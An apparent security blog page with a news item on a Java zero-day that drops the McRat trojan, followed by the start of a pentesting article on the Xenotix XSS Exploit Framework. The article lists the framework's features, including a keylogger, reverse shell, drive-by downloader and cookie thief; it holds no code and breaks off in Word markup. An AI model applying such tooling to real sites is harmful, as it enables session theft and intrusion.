<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYqwX0A9YZdpU1Xu6LrEDhu_F55ydRyz8aXWvI9cg8-40SWNiEoVbCliPLmkdQTcHbaAwmZ2VW5vVtmxjYOFni6d77SgTQd0gqlr8gpDczIupMAEGty-wUZbMEDeIZHMY70vuTbuWLPME/s1600/Java_Bullet.jpg" imageanchor="1"><img border="0" height="378" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYqwX0A9YZdpU1Xu6LrEDhu_F55ydRyz8aXWvI9cg8-40SWNiEoVbCliPLmkdQTcHbaAwmZ2VW5vVtmxjYOFni6d77SgTQd0gqlr8gpDczIupMAEGty-wUZbMEDeIZHMY70vuTbuWLPME/s320/Java_Bullet.jpg" width="577" /></a></div><div><br /></div><div><br /></div><div>So, you thought you were out of the woods with Java? Bad news. You aren't. Another Java zero-day vulnerability has been found in the wild by <b>FireEye</b>.</div><div><br /></div><div>Java v1.6 and Java v1.7 Update 15 on browsers are being targeted this time around. The previously unknown and unpatched vulnerability exploits browsers to install a remote-access trojan named McRat.</div><div><br /></div><div>McRat is a Windows Trojan therefore Windows users are prone to such an attack. It is not clear whether Mac and Linux users are at risk as well.</div><div><br /><a name='more'></a></div><div><b>According to FireEye researchers;</b></div><div><br /></div><blockquote class="tr_bq"><span style="background-color: white; color: #222222; line-height: 25px; text-align: -webkit-auto;"><span style="font-family: inherit;"><i>We have notified Oracle and will continue to work with Oracle on this in-the-wild discovery. Since this exploit affects the latest Java 6u41 and Java 7u15 versions, we urge users to disable Java in your browser until a patch has been released; alternatively, set your Java security settings to 'High' and do not execute any unknown Java applets outside of your organization.</i></span></span></blockquote><div><span style="background-color: white; color: #222222; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 15px; line-height: 25px; text-align: -webkit-auto;"><br /></span></div><div>If you are a Windows user and fear such an attack, we would suggest an uninstallation of Java because, as yet, there are no solutions to this problem.</div><div><br /></div><div>The next security updates are scheduled for 16th April but Oracle will be forced to push an Emergency update in the light of current events.</div><div><br /></div><div>Cheers!</div><div><br /></div><div><b>About the Author:</b></div><div>This article has been written by Dr. Sindhia Javed Junejo. She is one of the core members of RHA team.</div></div>

Another Java Zero-Day Vulnerability Spotted In The Wild

So, you thought you were out of the woods with Java? Bad news. You aren't. Another Java zero-day vulnerability has been found in the wil...

+ Read more »

Exploiting XSS Vulnerabilites With Xenotix

<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><br /></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://oi48.tinypic.com/nprmt3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://oi48.tinypic.com/nprmt3.jpg" /></a></div><br /><h3><b style="mso-bidi-font-weight: normal;"><span lang="EN-GB" style="font-size: 18.0pt; line-height: 115%; mso-ansi-language: EN-GB; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;">Introduction</span></b> </h3><br /><div class="MsoNormal"><span lang="EN-GB" style="font-size: 12.0pt; line-height: 115%; mso-ansi-language: EN-GB; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;">Cross Site Scripting or XSS vulnerabilities have been reported and exploited since 1990s. XSS got listed as the top 3^rdVulnerability in the OWASP 2013 Web application Vulnerabilities list. </span><span style="font-size: 11.5pt; line-height: 115%;">Cross-site scripting (XSS) is a type of security vulnerability typically found in web applications which allows the attackers to inject client-side script into web pages viewed by other users. The execution of the injected code takes place at client side. A cross site scripting vulnerability can be used by the attacker to bypass the Same Origin Policy (SOP). In the past, the potentials of XSS vulnerability were not known. XSS was mainly used for stealing cookies and for temporary or permanent defacements and was not considered as high risk vulnerability. But later XSS tunneling and Payload delivering showed us the potential of XSS Vulnerability. Most of the large websites like Google, Facebook, Twitter, Microsoft, and Amazon etc. even now suffers from XSS bugs. That’s a brief introduction about XSS. </span></div><a name='more'></a><h4 class="MsoNormal"><b style="mso-bidi-font-weight: normal;"><span style="font-size: 18.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;">Some threats due to XSS</span></b></h4><div class="MsoNormal"><b style="mso-bidi-font-weight: normal;"><span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;">XSS Tunneling</span></b><span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;">: With XSS Tunnel a hacker will obtain the traffic between the victim and a webserver.</span></div><div class="MsoNormal"><b style="mso-bidi-font-weight: normal;"><span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;">Client side code injection</span></b><span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;">: A hacker can inject malicious codes and execute them at client side.</span></div><div class="MsoNormal"><b style="mso-bidi-font-weight: normal;"><span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;">DOS:</span></b><span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"> A hacker can perform DOS against a remote server or against the client itself.</span></div><div class="MsoNormal"><b style="mso-bidi-font-weight: normal;"><span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;">Cookie Stealing</span></b><span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;">: A hacker can obtain the session cookies or tokens of a victim.</span></div><div class="MsoNormal"><b style="mso-bidi-font-weight: normal;"><span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;">Malware Spreading</span></b><span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;">: A hacker can spread malwares with a website which is vulnerable to XSS.</span></div><div class="MsoNormal"><b style="mso-bidi-font-weight: normal;"><span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;">Phishing</span></b><span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;">: A hacker can embed or redirect to a fake page of the website to get the login credentials of the victim.</span></div><div class="MsoNormal"><b style="mso-bidi-font-weight: normal;"><span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;">Defacing:</span></b><span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"> Temporary or permanent defacement of web application is possible </span></div><h4 class="MsoNormal"><b style="mso-bidi-font-weight: normal;"><span style="font-size: 18.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;">What is Xenotix XSS Exploit Framework?</span></b></h4><div class="separator" style="clear: both; text-align: center;"><a href="http://oi48.tinypic.com/fc5o9y.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="242" src="http://oi48.tinypic.com/fc5o9y.jpg" width="400" /></a></div><div class="MsoNormal"><br /></div><br /><div class="MsoNormal"></div><div class="MsoNormal"><b><span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;">Xenotix XSS Exploit Framework </span></b><span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;">is a penetration testing tool to detect and exploit XSS vulnerabilities in Web Applications.This tool can inject codes into a webpage which are vulnerable to XSS.It is basically a payload list based XSS Scanner and XSS Exploitation kit. It provides a penetration tester the ability to test all the XSS payloads available in the payload list against a web application to test for XSS vulnerabilities. The tool supports both manual mode and automated time sharing based test modes. The exploitation framework in the tool includes a XSS encoder, a victim side XSS keystroke logger, an Executable Drive-by downloader, a XSS Reverse Shell and a XSS DDoSer. These exploitation tools will help the penetration tester to create proof of concept attacks on vulnerable web applications during the creation of a penetration test report.</span></div><br /><div class="MsoNormal"><span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"> </span></div><h4 class="MsoNormal"><b style="mso-bidi-font-weight: normal;"><span style="font-size: 18.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;">Features of Xenotix XSS Exploit Framework</span></b></h4><div class="MsoNormal"><span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;">Xenotix XSS Exploit Framework is divided into two module<br /></span></div><h4><span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"></span><b style="mso-bidi-font-weight: normal;"><span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"><span style="mso-spacerun: yes;">       </span>1.Scanner Module</span></b></h4><div class="MsoListParagraphCxSpFirst" style="mso-list: l0 level1 lfo1; text-indent: -.25in;"><span style="font-family: Symbol; font-size: 14.0pt; mso-bidi-font-family: Symbol; mso-bidi-font-size: 12.0pt; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font: 7.0pt "Times New Roman";">        </span></span></span><span style="font-family: "Calibri","sans-serif"; font-size: 14.0pt; mso-ascii-theme-font: minor-latin; mso-bidi-font-size: 12.0pt; mso-bidi-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;">Built in XSS Payloads</span></div><div class="MsoListParagraphCxSpMiddle" style="mso-list: l0 level1 lfo1; text-indent: -.25in;"><span style="font-family: Symbol; font-size: 14.0pt; mso-bidi-font-family: Symbol; mso-bidi-font-size: 12.0pt; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font: 7.0pt "Times New Roman";">        </span></span></span><span style="font-family: "Calibri","sans-serif"; font-size: 14.0pt; mso-ascii-theme-font: minor-latin; mso-bidi-font-size: 12.0pt; mso-bidi-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;">HTML5 compactable Payload list</span></div><div class="MsoListParagraphCxSpMiddle" style="mso-list: l0 level1 lfo1; text-indent: -.25in;"><span style="font-family: Symbol; font-size: 14.0pt; mso-bidi-font-family: Symbol; mso-bidi-font-size: 12.0pt; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font: 7.0pt "Times New Roman";">        </span></span></span><span style="font-family: "Calibri","sans-serif"; font-size: 14.0pt; mso-ascii-theme-font: minor-latin; mso-bidi-font-size: 12.0pt; mso-bidi-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;">XSS Auto mode Scanner</span></div><div class="MsoListParagraphCxSpMiddle" style="mso-list: l0 level1 lfo1; text-indent: -.25in;"><span style="font-family: Symbol; font-size: 14.0pt; mso-bidi-font-family: Symbol; mso-bidi-font-size: 12.0pt; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font: 7.0pt "Times New Roman";">        </span></span></span><span style="font-family: "Calibri","sans-serif"; font-size: 14.0pt; mso-ascii-theme-font: minor-latin; mso-bidi-font-size: 12.0pt; mso-bidi-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;">XSS Multi-Parameter Scanner</span></div><div class="MsoListParagraphCxSpLast" style="mso-list: l0 level1 lfo1; text-indent: -.25in;"><span style="font-family: Symbol; font-size: 14.0pt; mso-bidi-font-family: Symbol; mso-bidi-font-size: 12.0pt; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font: 7.0pt "Times New Roman";">        </span></span></span><span style="font-family: "Calibri","sans-serif"; font-size: 14.0pt; mso-ascii-theme-font: minor-latin; mso-bidi-font-size: 12.0pt; mso-bidi-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;">XSS Fuzzer</span></div><div class="MsoNormal" style="margin-left: .25in;"><br /></div><br /><h4><b style="mso-bidi-font-weight: normal;"><span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;">       2. Exploitation Framework</span></b> </h4><div class="MsoListParagraphCxSpFirst" style="mso-list: l0 level1 lfo1; text-indent: -.25in;"><span style="font-family: Symbol; font-size: 14.0pt; mso-bidi-font-family: Symbol; mso-bidi-font-size: 12.0pt; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font: 7.0pt "Times New Roman";">        </span></span></span><span style="font-family: "Calibri","sans-serif"; font-size: 14.0pt; mso-ascii-theme-font: minor-latin; mso-bidi-font-size: 12.0pt; mso-bidi-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;">XSS Keylogger</span></div><div class="MsoListParagraphCxSpMiddle" style="mso-list: l0 level1 lfo1; text-indent: -.25in;"><span style="font-family: Symbol; font-size: 14.0pt; mso-bidi-font-family: Symbol; mso-bidi-font-size: 12.0pt; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font: 7.0pt "Times New Roman";">        </span></span></span><span style="font-family: "Calibri","sans-serif"; font-size: 14.0pt; mso-ascii-theme-font: minor-latin; mso-bidi-font-size: 12.0pt; mso-bidi-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;">XSS Executable Drive-by downloader</span></div><div class="MsoListParagraphCxSpMiddle" style="mso-list: l0 level1 lfo1; text-indent: -.25in;"><span style="font-family: Symbol; font-size: 14.0pt; mso-bidi-font-family: Symbol; mso-bidi-font-size: 12.0pt; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font: 7.0pt "Times New Roman";">        </span></span></span><span style="font-family: "Calibri","sans-serif"; font-size: 14.0pt; mso-ascii-theme-font: minor-latin; mso-bidi-font-size: 12.0pt; mso-bidi-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;">XSS Payload Encoder</span></div><div class="MsoListParagraphCxSpMiddle" style="mso-list: l0 level1 lfo1; text-indent: -.25in;"><span style="font-family: Symbol; font-size: 14.0pt; mso-bidi-font-family: Symbol; mso-bidi-font-size: 12.0pt; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font: 7.0pt "Times New Roman";">        </span></span></span><span style="font-family: "Calibri","sans-serif"; font-size: 14.0pt; mso-ascii-theme-font: minor-latin; mso-bidi-font-size: 12.0pt; mso-bidi-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;">XSS Reverse Shell</span></div><div class="MsoListParagraphCxSpMiddle" style="mso-list: l0 level1 lfo1; text-indent: -.25in;"><span style="font-family: Symbol; font-size: 14.0pt; mso-bidi-font-family: Symbol; mso-bidi-font-size: 12.0pt; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font: 7.0pt "Times New Roman";">        </span></span></span><span style="font-family: "Calibri","sans-serif"; font-size: 14.0pt; mso-ascii-theme-font: minor-latin; mso-bidi-font-size: 12.0pt; mso-bidi-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;">XSS DDoSer</span></div><div class="MsoListParagraphCxSpMiddle" style="mso-list: l0 level1 lfo1; text-indent: -.25in;"><span style="font-family: Symbol; font-size: 14.0pt; mso-bidi-font-family: Symbol; mso-bidi-font-size: 12.0pt; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·<span style="font: 7.0pt "Times New Roman";">        </span></span></span><span style="font-family: "Calibri","sans-serif"; font-size: 14.0pt; mso-ascii-theme-font: minor-latin; mso-bidi-font-size: 12.0pt; mso-bidi-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;">XSS Cookie Thief</span></div><div class="MsoListParagraphCxSpLast"><br /></div><h4 class="MsoNormal"><b style="mso-bidi-font-weight: normal;"><span style="font-size: 18.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;">1. Scanner Module</span></b></h4><div class="MsoNormal"><br /><b style="mso-bidi-font-weight: normal;"><span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"><!--[if gte mso 9]><xml> <o:OfficeDocumentSettings> <o:RelyOnVML/> <o:AllowPNG/> </o:OfficeDocumentSettings></xml><![endif]--></span></b><b style="mso-bidi-font-weight: normal;"><span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"><!--[if gte mso 9]><xml> <w:WordDocument> <w:View>Normal</w:View> <w:Zoom>0</w:Zoom> <w:TrackMoves/> <w:TrackFormatting/> <w:PunctuationKerning/> <w:ValidateAgainstSchemas/> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:DoNotPromoteQF/> <w:LidThemeOther>EN-US</w:LidThemeOther> <w:LidThemeAsian>X-NONE</w:LidThemeAsian> <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript> <w:Compatibility> <w:BreakWrappedTables/> <w:SnapToGridInCell/> <w:WrapTextWithPunct/> <w:UseAsianBreakRules/> <w:DontGrowAutofit/> <w:SplitPgBreakAndParaMark/> <w:DontVertAlignCellWithSp/> <w:DontBreakConstrainedForcedTables/> <w:DontVertAlignInTxbx/> <w:Word11KerningPairs/> <w:CachedColBalance/> </w:Compatibility> <m:mathPr> <m:mathFont m:val="Cambria Math"/> <m:brkBin m:val="before"/> <m:brkBinSub m:val="--"/> <m:smallFrac m:val="off"/> <m:dispDef/> <m:lMargin m:val="0"/> <m:rMargin m:val="0"/> <m:defJc m:val="centerGroup"/> <m:wrapIndent m:val="1440"/> <m:intLim m:val="subSup"/> <m:naryLim m:val="undOvr"/> </m:mathPr></w:WordDocument></xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true" DefSemiHidden="true" DefQFormat="false" DefPriority="99" LatentStyleCount="267"> <w:LsdException Locked="false" Priority="0" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Normal"/> <w:LsdException Locked="false" Priority="9" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="heading 1"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/> <w:LsdException Locked="false" Priority="39" Name="toc 1"/> <w:LsdException Locked="false" Priority="39" Name="toc 2"/> <w:LsdException Locked="false" Priority="39" Name="toc 3"/> <w:LsdException Locked="false" Priority="39" Name="toc 4"/> <w:LsdException Locked="false" Priority="39" Name="toc 5"/> <w:LsdException Locked="false" Priority="39" Name="toc 6"/> <w:LsdException Locked="false" Priority="39" Name="toc 7"/> <w:LsdException Locked="false" Priority="39" Name="toc 8"/> <w:LsdException Locked="false" Priority="39" Name="toc 9"/> <w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption"/> <w:LsdException Locked="false" Priority="10" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Title"/> <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/> <w:LsdException Locked="false" Priority="11" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/> <w:LsdException Locked="false" Priority="22" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Strong"/> <w:LsdException Locked="false" Priority="20" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/> <w:LsdException Locked="false" Priority="59" SemiHidden="false" UnhideWhenUsed="false" Name="Table Grid"/> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/> <w:LsdException Locked="false" Priority="1" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false" UnhideWhenUsed="false" Name="Light Shading"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false" UnhideWhenUsed="false" Name="Light List"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false" UnhideWhenUsed="false" Name="Light Grid"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 1"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 2"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 1"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 2"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 1"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 2"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 3"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false" UnhideWhenUsed="false" Name="Dark List"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Shading"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful List"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Grid"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false" UnhideWhenUsed="false" Name="Light Shading Accent 1"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false" UnhideWhenUsed="false" Name="Light List Accent 1"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false" UnhideWhenUsed="false" Name="Light Grid Accent 1"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/> <w:LsdException Locked="false" Priority="34" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/> <w:LsdException Locked="false" Priority="29" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Quote"/> <w:LsdException Locked="false" Priority="30" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false" UnhideWhenUsed="false" Name="Dark List Accent 1"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful List Accent 1"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false" UnhideWhenUsed="false" Name="Light Shading Accent 2"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false" UnhideWhenUsed="false" Name="Light List Accent 2"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false" UnhideWhenUsed="false" Name="Light Grid Accent 2"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false" UnhideWhenUsed="false" Name="Dark List Accent 2"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful List Accent 2"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false" UnhideWhenUsed="false" Name="Light Shading Accent 3"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false" UnhideWhenUsed="false" Name="Light List Accent 3"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false" UnhideWhenUsed="false" Name="Light Grid Accent 3"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false" UnhideWhenUsed="false" Name="Dark List Accent 3"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful List Accent 3"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false" UnhideWhenUsed="false" Name="Light Shading Accent 4"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false" UnhideWhenUsed="false" Name="Light List Accent 4"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false" UnhideWhenUsed="false" Name="Light Grid Accent 4"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false" UnhideWhenUsed="false" Name="Dark List Accent 4"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful List Accent 4"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false" 